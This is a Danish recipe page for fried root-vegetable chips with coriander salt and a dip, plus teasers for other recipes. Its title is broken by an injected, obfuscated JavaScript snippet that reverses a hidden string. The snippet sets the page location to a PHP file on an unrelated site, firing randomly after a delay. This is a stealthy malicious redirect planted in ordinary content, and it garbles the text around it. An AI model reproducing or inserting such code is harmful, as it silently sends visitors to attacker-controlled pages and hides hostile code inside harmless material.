Crispy rodfrugtechips med kori$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andersalt og dip

Det er en ren farvesymfoni, når gulerødder, rødbeder, persillerødder og kartofler hopper en tur i den varme olie. Til chips er det oplagt at eksperimentere med forskellige slags kryddersalt for at pifte de sprøde flager op. Her er korianderfrø, sort peber og salt blevet knust i en morter og drysset med rund hånd – både over chipsene og i creme fraiche-dippen.

1 stor portion chips

3 bagekartofler eller 6 almindelige kartofler, skåret i ultratynde skiver
3 gulerødder, skåret i ultratynde skiver
3 rødbeder, skåret i ultratynde skiver
3 persillerødder, skåret i ultratynde skiver
1 l smagsneutral olie, vindrue- eller rapsolie

Koriandersalt:
1 spsk korianderfrø
1 spsk sort peber
3 spsk groft salt

Dip:
1 dl cremefraiche
1 citron, saften af
2 tsk koriandersalt, se ovenfor

Varm olien op i en tykbundet gryde. Når det syder omkring træspidsen på en tændstik, er olien varm nok. Sænk forsigtigt kartoffel-, gulerods-, rødbede- og persillerodsskiver ned i olien. Friter evt. ad flere omgange. Friter dem i ca. 2 min., eller til olien er holdt op med at syde og sprutte. Tag chipsene op af gryden med en hul- eller netske. Læg dem på fedtsugende papir eller køkkenrulle. Lad dem køle af.
Koriandersalt: Kom korianderfrø, sort peber og salt i en morter, og knus dem til pulver. Drys pulveret over chipsene.
Dip: Bland cremefraiche, citronsaft og koriandersalt, smag til, og server til chipsene.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere